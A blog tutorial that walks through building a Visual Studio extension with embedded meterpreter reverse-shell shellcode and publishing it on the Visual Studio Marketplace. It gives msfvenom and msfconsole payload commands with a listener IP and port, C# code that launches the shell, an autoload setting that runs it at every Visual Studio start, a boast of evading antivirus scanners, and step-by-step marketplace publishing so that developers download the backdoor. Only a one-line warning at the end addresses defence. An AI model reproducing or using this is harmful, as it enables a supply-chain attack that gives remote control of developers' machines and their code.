Distributing malicious add-in through Microsoft Marketplace

Meterpreter, one of the best helper tools without doubt. Almost we can’t imagine a security test without it. We need a strong malicious code like “meterpreter” at all out tests, works, researches. Pivoting modules, small size and stability makes meterpreter one of the strongest tools.

Meterpreter’s power increases when used with a good distribute technique at windows operating systems. If our malicious code can’t send to target system through exploit and we use it as backdoor, distributing technique as important as developing code.

Using MSFVenom we can create meterpreter for different types and platforms. In this article we focus on two main subjects.

  • Creating malicious add-in for visual studio.
  • Distributing malicious add-in through Visual Studio Marketplace.

Github: VSIXPreter

Creating Malicious Visual Studio Add-in

I needed a malware that integrate with Visual Studio and execute automatically when it starts.  So I decided to write a Visual Studio add-in and put malicious code in it.

To do that, click “Create New Project -> Extensibility -> VSIX Project”.

Distributing malicious add-in through Microsoft Marketplace

If you can’t find it, you must install the SDK. For install SDK, open Visual Studio Installer then enable “Visual Studio extension development”.

I created a project named VSIXPreter, after the creating project “index.html” and “stylesheet.css” will be created automatically. We do not need these files so delete them. After that, right click to project and click to Add\New Item -> Extensibility -> Custom Command. I named this file as “PreterCommand.cs”. In this file we will add meterpreter codes.

Distributing malicious add-in through Microsoft Marketplace

Before start coding we need to create shellcode of meterpreter using MSFVenom. Code must be C# compatible.

Distributing malicious add-in through Microsoft Marketplace

msfvenom -p windows/ meterpreter/ reverse_tcp LHOST=192.168.228.127 LPORT=4444 –platform windows -f csharp

With above command we create a C# compatible shellcode for reverse_tcp connection to 192.168.22.127:4444.

msfconsole -q use windows/ meterpreter/ reverse_tcp set LHOST 192.168.228.127 set LPORT 4444 generate -p windows -t csharp

Additionally, we can create shellcode on MSFConsole.  By both methods, we will get a C# compatible shell code. The point we need to look out for on both method parameters can change. For instance, “-p” parameter specifies payload on MSFVenom, but on MSFConsole it specifies platform.

For creating shellcode with MSFVenom and running shellcode on C#, you can look at my other blog posts at below.

Distributing malicious add-in through Microsoft Marketplace

To run shellcode, we need three functions. We declare these three functions as above. VirtualAlloc, allocates memory for our shellcode. CreateThread, creates thread and WaitForSingleObject, checks specified objects validity.

Distributing malicious add-in through Microsoft Marketplace

I declared a method named RunMeterpreter and this method takes IP and port as parameters. Implementation of method shown at below.

Distributing malicious add-in through Microsoft Marketplace

I set a variable named shellCodeRaw to Base64 encode of meterpreter shellcode. After I calculate the IP address, port and offset values (newShellCode), put the Base64 encode of newShellCode to real shell code. With this way, every time I change my IP address instead of creating new shellcode I can change the parameters.

private void Execute (object sender, EventArgs e)
{
Task.Factory.StartNew(() => RunMeterpreter (“192.168.228.127”, “4444”));
}

So, we write the method that run meterpreter. To run that method, we write the code that shown at above in “PreterCommand.cs” files automatically created “Execute” method. With this code we create thread from Task class and call the RunMeterpreter method. Now our add-in ready, we can compile it and get the add-in.

msfconsole -q
use exploit/multi/handler
set PAYLOAD windows /meterpreter /reverse_tcp
set LHOST 192.168.228.127
set LPORT 4444
set ExitOnSession false exploit -j

To handle incoming connection from meterpreter we start a multi/handler like above. Now we can install the add-in by running vsix (visual studio extension) file. Don’t forget to close Visual Studio if it’s not you can get an error.

Distributing malicious add-in through Microsoft Marketplace

When our project compile, compiler will create “VSIXPreter.dll” and “VSIXPreter.vsix” files. If you run VSIXPreter.vsix file, VSIX Installer appears and ask you want to install add-in or not, like above. We can click “Install” to install add-in to Visual Studio.

Distributing malicious add-in through Microsoft Marketplace

After installing complete we will see a screen like above, then we can get a meterpreter connection by clicking “Tools -> Run PreterCommand” in Visual Studio.

Distributing malicious add-in through Microsoft Marketplace

As you can see Run PeterCommand added to Tools menu, sends reverse shell to specified address every time it clicked. But there is problem, we can’t sure that user will click it. So that we must trigger automatically when Visual Studio starts. But before, let’s upload “VSIXPreter.vsix” file to VirusTotal and check the results.

Distributing malicious add-in through Microsoft Marketplace

 And Bingo! 0/60. None of the anti-malware product can detect our malware. So, let’s examine malware on ProcessHacker.

Link: virustotal.com/#/file/ e4523493d6047b7930e0c e05d71b271b48a26be62 15da2d9145fc2991d807aa9

Distributing malicious add-in through Microsoft Marketplace

When “PreterCommand.cs” file created, “PreterCommandPackage.cs” file will be created. In this file we can assure malware run at startup by declaring parameter at above.

Distributing malicious add-in through Microsoft Marketplace

We must specify the case of autoload by ProvideAutoLoad. VSContants.UICONTEXT. NoSolution_string parameter is what we need.

Distributing malicious add-in through Microsoft Marketplace

Also, we can specify dozens of auto load cases. For example, any C# Projects opens, when code screen appears, when turn debug mode, when we drag something or when a background project loaded. There is one more step, when Visual Studio runs we must call the RunMeterpreter command using task.

Distributing malicious add-in through Microsoft Marketplace

We can use PreterCommandPackage method in PreterCommandPackage.cs file for this manner. Task that we declared in this method will create a new thread and thread will call the RunMeterpreter method. In this way we will get a shell and application will not freeze.

Distributing Malware

We have a Visual Studio add-in, but we need to distribute it. I preferred Visual Studio Marketplace for that purpose. We can send the malicious add-in to marketplace and wait to download. If we develop nice and eye-catching add-in, we increase probability of download. I have uploaded the application to marketplace for sample. I was curious about the app will be published or not, but I was not mistaken in my estimates, app published in 5 minutes.

To publishing and add-in on the store, we need an “Visual Studio Marketplace Publishing Portal” account. For this account we can use any Microsoft account.

Firstly, login at https://marketplace.visualstudio.com. At the main page we click “Publish extensions” to reach “Manage Publishers & Extensions” page. After that we need to create a publisher by clicking “Create Publisher” button.

Distributing malicious add-in through Microsoft Marketplace

You will a form like above. In the form your information that you give is very important because they must be to coincide with your applications Assemblies information. Otherwise you can’t upload your application.

Distributing malicious add-in through Microsoft Marketplace

We click to “New Extension -> Visual Studio” like screenshot above. Then marketplace will open a page and want to upload application.

Distributing malicious add-in through Microsoft Marketplace

Then we select the application and fill the form to upload to marketplace.

Distributing malicious add-in through Microsoft Marketplace

After uploading done, we will see our application in list. To make application available to everyone, right click to application and select “Make Public”. Application will be approved in 5 minutes, there is no malicious code check.

Distributing malicious add-in through Microsoft Marketplace

If any developer installs our add-in, every time his starts Visual Studio we get and meterpreter shell.

Distributing malicious add-in through Microsoft Marketplace

To download our application, go to “Tools -> Extensions and Updates -> Online” and search for “vsixpreter”.

Distributing malicious add-in through Microsoft Marketplace

As you can see above, meterpreter connection started at process 31488 and send connection to 192.168.228.127 IP address.

Not every application at the marketplace. Always check downloaded applications. Don’t forget there can be more bad scenarios (like stealing our source codes).

Yazar: Eyüp Çelik